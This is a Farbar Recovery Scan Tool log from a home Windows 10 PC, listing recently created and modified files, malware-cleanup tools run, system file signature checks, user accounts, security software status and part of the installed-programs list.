S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-03-01 21:57 - 2016-03-01 22:10 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-03-01 21:55 - 2016-03-01 21:55 - 00000000 ____D C:\Users\Kym\Downloads\mbar-1.09.3.1001
2016-03-01 21:53 - 2016-03-01 21:55 - 00000000 ____D C:\Users\Kym\Desktop\mbar-1.09.3.1001
2016-03-01 21:52 - 2016-03-01 21:54 - 16563352 _____ (Malwarebytes Corp.) C:\Users\Kym\Downloads\mbar-1.09.3.1001.exe
2016-03-01 21:48 - 2016-03-01 21:48 - 00016148 _____ C:\WINDOWS\system32\KYM-PC_Kym_HistoryPrediction.bin
2016-03-01 12:40 - 2016-03-01 21:57 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-01 12:40 - 2016-03-01 21:56 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-01 12:40 - 2016-03-01 12:40 - 00000692 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-01 12:40 - 2016-03-01 12:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-01 12:40 - 2016-03-01 12:40 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-01 12:40 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-01 12:40 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-01 12:39 - 2016-03-01 12:39 - 00000159 _____ C:\Users\Kym\Desktop\ckfiles.txt
2016-03-01 12:36 - 2016-03-01 12:36 - 00001001 _____ C:\Users\Kym\Desktop\JRT.txt
2016-03-01 12:33 - 2016-03-01 12:33 - 00005519 _____ C:\Users\Kym\Desktop\AdwCleaner[C1].txt
2016-03-01 12:27 - 2016-03-01 12:31 - 00000000 ____D C:\AdwCleaner
2016-03-01 12:24 - 2016-03-01 12:39 - 22908888 _____ (Malwarebytes ) C:\Users\Kym\Desktop\mbam-setup-2-2-0-1024.exe
2016-03-01 12:24 - 2016-03-01 12:38 - 00468480 _____ () C:\Users\Kym\Desktop\CKScanner.exe
2016-03-01 12:23 - 2016-03-01 12:34 - 01609216 _____ (Malwarebytes) C:\Users\Kym\Desktop\JRT.exe
2016-03-01 12:21 - 2016-03-01 12:27 - 01518592 _____ C:\Users\Kym\Desktop\AdwCleaner.exe
2016-03-01 12:19 - 2016-03-01 12:20 - 00016163 _____ C:\Users\Kym\Desktop\Fixlog.txt
2016-02-29 20:50 - 2016-02-29 20:50 - 00002245 _____ C:\Users\Kym\Desktop\aswMBR.txt
2016-02-29 20:50 - 2016-02-29 20:50 - 00000512 _____ C:\Users\Kym\Desktop\MBR.dat
2016-02-29 20:46 - 2016-03-01 22:11 - 00026829 _____ C:\Users\Kym\Desktop\FRST.txt
2016-02-29 20:46 - 2016-02-29 20:47 - 00072356 _____ C:\Users\Kym\Desktop\Addition.txt
2016-02-29 20:43 - 2016-03-01 22:11 - 00000000 ____D C:\FRST
2016-02-29 20:39 - 2016-02-29 20:39 - 00002342 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2016-02-29 20:39 - 2016-02-29 20:39 - 00000207 _____ C:\WINDOWS\tweaking.com-regbackup-KYM-PC-Windows-10-Home-(64-bit).dat
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\RegBackup
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2016-02-29 20:39 - 2016-02-29 20:39 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
2016-02-29 20:38 - 2016-02-29 20:47 - 05198336 _____ (AVAST Software) C:\Users\Kym\Desktop\aswMBR.exe
2016-02-29 20:38 - 2016-02-29 20:39 - 00016377 _____ C:\WINDOWS\Tweaking.com - Registry Backup Setup Log.txt
2016-02-29 20:36 - 2016-02-29 20:43 - 02371072 _____ (Farbar) C:\Users\Kym\Desktop\FRST64.exe
2016-02-29 20:35 - 2016-02-29 20:38 - 04777232 _____ (Tweaking.com) C:\Users\Kym\Downloads\tweaking.com_registry_backup_setup.exe
2016-02-29 19:37 - 2016-02-29 20:31 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2016-02-29 19:34 - 2016-02-29 19:34 - 00000000 ____D C:\WINDOWS\pss
2016-02-28 21:02 - 2016-01-08 22:44 - 00000822 _____ C:\WINDOWS\system32\Drivers\etc\hosts.20160228-210203.backup
2016-02-28 18:59 - 2016-02-28 18:59 - 00000000 ____D C:\Program Files\Common Files\AV
2016-02-28 18:50 - 2016-02-28 21:01 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-02-28 18:50 - 2016-02-28 20:23 - 00001494 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2016-02-28 18:50 - 2016-02-28 20:23 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-02-28 18:50 - 2016-02-28 18:50 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2016-02-28 18:50 - 2015-06-16 17:32 - 00020760 _____ (Safer-Networking Ltd.) C:\WINDOWS\system32\sdnclean64.exe
2016-02-28 18:04 - 2016-02-28 18:48 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Kym\Downloads\spybot-2.4.exe
2016-02-26 06:50 - 2016-02-26 06:50 - 00002378 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-26 00:30 - 2016-02-26 06:49 - 00000000 ____D C:\Users\Kym\AppData\Local\Deployment
2016-02-26 00:30 - 2016-02-26 00:30 - 00000000 ____D C:\Users\Kym\AppData\Local\Apps\2.0
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Sun
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Oracle
2016-02-25 23:16 - 2016-02-25 23:16 - 00000000 ____D C:\Users\Kym\.oracle_jre_usage
2016-02-18 15:04 - 2016-02-18 17:51 - 00000000 ____D C:\Users\Kym\Documents\Kalyani
2016-02-15 19:06 - 2016-02-15 19:06 - 00223232 _____ C:\Users\Kym\Downloads\Archibald Prize 2015 information.pdf
2016-02-15 13:32 - 2016-02-15 13:32 - 00281328 _____ C:\WINDOWS\Minidump\021516-19125-01.dmp
2016-02-13 19:16 - 2016-02-13 19:19 - 00000000 ____D C:\Users\Kym\AppData\Local\FullTiltPoker
2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Party
2016-02-13 19:06 - 2016-02-13 19:06 - 00000000 ____D C:\Users\Kym\AppData\Roaming\cef-cache
2016-02-13 19:00 - 2016-02-13 19:00 - 00000683 _____ C:\Users\Public\Desktop\Full Tilt Poker.lnk
2016-02-13 19:00 - 2016-02-13 19:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Full Tilt Poker
2016-02-13 18:11 - 2016-02-13 19:00 - 00877888 _____ C:\Users\Kym\Downloads\PartyPokerSetup.exe
2016-02-13 18:10 - 2016-02-13 18:59 - 73087280 _____ C:\Users\Kym\Downloads\FullTiltSetup.exe
2016-02-13 18:10 - 2016-02-13 18:10 - 00877888 _____ C:\Users\Kym\Downloads\Unconfirmed 937642.crdownload
2016-02-10 23:28 - 2016-01-31 16:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 23:28 - 2016-01-31 16:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 23:28 - 2016-01-31 16:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-02-10 23:28 - 2016-01-31 16:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 23:28 - 2016-01-31 16:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 23:28 - 2016-01-31 16:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-02-10 23:28 - 2016-01-31 15:38 - 21873152 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-02-10 23:28 - 2016-01-31 15:33 - 24593920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-02-10 23:28 - 2016-01-31 15:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 23:28 - 2016-01-31 15:26 - 06787072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-02-10 23:28 - 2016-01-31 15:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-10 23:28 - 2016-01-31 15:25 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-02-10 23:28 - 2016-01-31 15:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 23:28 - 2016-01-31 15:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 23:28 - 2016-01-31 15:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-02-10 23:28 - 2016-01-31 15:11 - 05156352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-02-10 23:28 - 2016-01-31 15:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 23:28 - 2016-01-31 15:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-02-10 23:27 - 2016-01-31 16:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 23:27 - 2016-01-31 16:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 23:27 - 2016-01-31 16:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 23:27 - 2016-01-31 16:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 23:27 - 2016-01-31 15:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-10 23:27 - 2016-01-31 15:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
2016-02-10 23:27 - 2016-01-31 15:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-02-10 23:27 - 2016-01-31 15:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 23:27 - 2016-01-31 15:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 23:27 - 2016-01-31 15:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-02-10 23:27 - 2016-01-31 15:24 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-02-10 23:27 - 2016-01-31 15:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 23:27 - 2016-01-31 15:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-02-10 23:27 - 2016-01-31 15:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-02-10 23:27 - 2016-01-31 15:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-02-10 23:27 - 2016-01-31 15:18 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-02-10 23:27 - 2016-01-31 15:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 23:27 - 2016-01-31 15:17 - 19324928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-02-10 23:27 - 2016-01-31 15:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 23:27 - 2016-01-31 15:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-02-10 23:27 - 2016-01-31 15:14 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-02-10 23:27 - 2016-01-31 15:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2016-02-10 23:27 - 2016-01-31 15:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 23:27 - 2016-01-31 15:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 23:27 - 2016-01-31 15:07 - 18802176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-02-10 23:27 - 2016-01-31 15:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-02-10 23:27 - 2016-01-31 15:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 23:27 - 2016-01-31 15:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 23:27 - 2016-01-31 15:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 23:27 - 2016-01-31 14:59 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-02-10 23:27 - 2016-01-31 14:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 22:56 - 2016-02-09 22:56 - 00281328 _____ C:\WINDOWS\Minidump\020916-19296-01.dmp
2016-02-09 03:29 - 2016-02-09 03:29 - 00001277 _____ C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CNext.lnk
2016-02-09 03:28 - 2016-02-09 03:28 - 00004296 _____ C:\WINDOWS\System32\Tasks\AMD Updater
2016-02-09 03:25 - 2016-02-13 19:16 - 00000000 ____D C:\Users\Kym\AppData\Local\AMD
2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-02-09 03:25 - 2016-02-09 03:25 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2016-02-09 03:20 - 2016-02-09 03:23 - 322471624 _____ (AMD Inc.) C:\Users\Kym\Downloads\radeon-crimson-15.12-win10-64bit.exe
2016-02-08 02:13 - 2016-02-08 02:13 - 00000202 _____ C:\Users\Kym\Desktop\Tom Clancy's Rainbow Six Siege.url
2016-02-03 19:16 - 2016-02-03 19:16 - 06253170 _____ C:\Users\Kym\Downloads\1776 - Donkey Kong Country 2 (U)(Independent).zip
2016-02-03 19:07 - 2016-02-03 19:08 - 11918630 _____ C:\Users\Kym\Downloads\2214 - Donkey Kong Country 3 (E)(Rising Sun).zip
2016-02-03 19:06 - 2016-02-03 19:06 - 02981626 _____ C:\Users\Kym\Downloads\Donkey Kong Country 2 - Diddy's Kong Quest (USA) (En,Fr) (Rev A).zip
2016-02-03 19:04 - 2016-02-03 19:04 - 05642942 _____ C:\Users\Kym\Downloads\1055 - Donkey Kong Country (U)(Evasion).zip
2016-02-02 12:22 - 2016-02-02 12:22 - 00000000 ____D C:\Users\Kym\Documents\MIsc
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-03-01 22:06 - 2014-05-02 21:01 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-01 21:42 - 2014-10-12 20:42 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-01 20:14 - 2015-12-25 19:32 - 00004144 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5957CCCD-7167-42EC-BDE9-58F86B871E77}
2016-03-01 17:06 - 2014-05-02 21:01 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-01 13:55 - 2014-05-02 22:28 - 00000000 ____D C:\Users\Kym\AppData\Roaming\uTorrent
2016-03-01 12:54 - 2015-08-09 01:28 - 01011482 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-01 12:54 - 2015-07-10 21:02 - 00000000 ____D C:\WINDOWS\INF
2016-03-01 12:52 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-01 12:49 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2016-03-01 12:48 - 2015-08-09 01:48 - 00000000 __SHD C:\Users\Kym\IntelGraphicsProfiles
2016-03-01 12:48 - 2015-08-09 01:27 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-03-01 12:48 - 2015-07-10 22:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-01 12:48 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\addins
2016-03-01 12:48 - 2015-07-10 19:05 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-03-01 12:19 - 2015-08-09 17:12 - 00000000 ____D C:\Users\Kym\AppData\LocalLow\Temp
2016-03-01 12:19 - 2015-08-09 01:29 - 00000000 ____D C:\Users\Kym
2016-02-29 12:23 - 2015-07-10 21:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-28 17:59 - 2014-05-02 21:43 - 00004280 _____ C:\WINDOWS\System32\Tasks\avast! Emergency Update
2016-02-26 00:31 - 2015-08-09 11:27 - 00000000 ____D C:\Users\Kym\AppData\Local\MicrosoftEdge
2016-02-25 23:54 - 2009-07-14 15:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-02-25 23:38 - 2015-04-09 16:31 - 00000000 ____D C:\Users\Kym\Documents\Outlook Files
2016-02-25 23:16 - 2014-10-18 18:59 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-25 23:16 - 2014-10-18 18:59 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-25 22:43 - 2014-10-18 18:43 - 00000000 ____D C:\AMD
2016-02-19 20:02 - 2015-03-12 22:56 - 00000000 ____D C:\Users\Kym\AppData\Local\Spotify
2016-02-19 20:01 - 2015-03-12 22:54 - 00000000 ____D C:\Users\Kym\AppData\Roaming\Spotify
2016-02-18 21:54 - 2016-01-16 18:56 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-18 00:33 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-02-16 19:47 - 2015-07-10 21:04 - 00000000 ____D C:\WINDOWS\rescache
2016-02-16 19:24 - 2014-05-25 16:10 - 00000000 ____D C:\Users\Kym\AppData\Local\ElevatedDiagnostics
2016-02-15 20:11 - 2015-08-09 01:48 - 00000000 ____D C:\Users\Kym\AppData\Local\Packages
2016-02-15 13:32 - 2015-09-27 23:34 - 00000000 ____D C:\WINDOWS\Minidump
2016-02-13 19:10 - 2014-11-20 11:53 - 00000000 ____D C:\Users\Kym\AppData\Local\PokerStars
2016-02-13 13:57 - 2015-07-10 23:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-12 19:44 - 2015-08-08 23:54 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
2016-02-12 19:42 - 2015-07-10 20:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-02-12 19:42 - 2009-07-14 12:34 - 00000478 _____ C:\WINDOWS\win.ini
2016-02-12 19:41 - 2014-05-04 15:26 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-02-12 19:37 - 2014-05-04 15:26 - 146614896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-02-09 03:30 - 2014-09-29 14:52 - 00000000 ____D C:\Program Files (x86)\Raptr
2016-02-09 03:25 - 2015-08-09 01:27 - 00000000 ____D C:\Program Files\AMD
2016-02-09 03:25 - 2015-02-12 08:41 - 00000000 ____D C:\Program Files (x86)\AMD
2016-02-09 03:19 - 2014-09-22 17:29 - 00000000 ____D C:\ProgramData\AMD
2016-02-08 23:26 - 2015-11-28 22:42 - 00000000 ____D C:\Users\Kym\AppData\Local\Ubisoft Game Launcher
2016-02-08 16:30 - 2014-09-02 15:05 - 00000000 ____D C:\Users\Kym\Documents\My Games
2016-02-08 16:17 - 2015-08-09 01:28 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-03 08:47 - 2015-07-10 21:06 - 00828920 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-02-03 08:47 - 2015-07-10 21:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-02-02 17:01 - 2014-05-02 21:01 - 00003978 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-02 17:01 - 2014-05-02 21:01 - 00003746 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-01 22:21 - 2014-10-03 09:28 - 00000000 ____D C:\Users\Kym\Documents\Bond
2016-02-01 21:47 - 2014-05-02 21:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
==================== Files in the root of some directories =======
2015-09-08 19:17 - 2015-09-08 19:17 - 0000000 _____ () C:\Program Files (x86)\ATI Technologies
2015-08-14 11:25 - 2015-08-14 11:25 - 0000000 _____ () C:\Program Files (x86)\Common Files\AMD
2014-07-23 14:06 - 2015-02-19 13:45 - 0000953 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Settings.ini
2014-07-23 17:57 - 2015-08-09 01:04 - 0000028 _____ () C:\Users\Kym\AppData\Roaming\Network Meter_Usage.ini
2014-05-02 20:55 - 2014-08-28 11:18 - 0007599 _____ () C:\Users\Kym\AppData\Local\Resmon.ResmonCfg
2015-06-18 16:22 - 2015-06-18 16:27 - 0000260 _____ () C:\ProgramData\csgobm.project
2015-06-18 16:22 - 2015-06-18 16:27 - 0000002 _____ () C:\ProgramData\csgobm2.project
2015-06-18 16:19 - 2015-06-18 16:19 - 0010299 _____ () C:\ProgramData\csgobmbacked.cfg
2015-06-18 16:19 - 2015-06-18 16:19 - 0000077 _____ () C:\ProgramData\csgobmsettings.ini
2015-08-09 01:27 - 2015-08-09 01:27 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Some files in TEMP:
====================
C:\Users\Kym\AppData\Local\Temp\sqlite3.dll
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-02-29 12:25
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
Ran by Kym (2016-03-01 22:12:09)
Running from C:\Users\Kym\Desktop
Windows 10 Home (X64) (2015-08-08 15:48:30)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-788086572-3644745805-1037152649-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-788086572-3644745805-1037152649-503 - Limited - Disabled)
Guest (S-1-5-21-788086572-3644745805-1037152649-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-788086572-3644745805-1037152649-1002 - Limited - Enabled)
Kym (S-1-5-21-788086572-3644745805-1037152649-1000 - Administrator - Enabled) => C:\Users\Kym
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Spybot - Search and Destroy (Enabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\uTorrent) (Version: 3.4.5.41712 - BitTorrent Inc.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.0 - Adobe Systems Incorporated)
Adobe Premiere Elements 11 (HKLM\...\PremElem110) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Premiere Elements 11 (Version: 11.0 - Adobe Systems Incorporated) Hidden
Adobe Reader XI (11.0.13) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
Apple Application Support (32-bit) (HKLM-x32\...\{3540ADD5-822B-47FB-B1C2-CD7B2C8E9FEC}) (Version: 4.0.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{C9C0FE2C-602E-49D7-8C42-5B9E8FF04798}) (Version: 4.0.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{FD244E19-6EFE-4A2D-948A-0D45D4C168BE}) (Version: 9.0.0.26 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.2.2218 - AVAST Software)
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Beyond Gravity (HKLM-x32\...\Steam App 317510) (Version: - Qwiboo Ltd)
BioShock (HKLM-x32\...\Steam App 7670) (Version: - 2K Boston)
BioShock 2 (HKLM-x32\...\Steam App 8850) (Version: - 2K Marin)
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
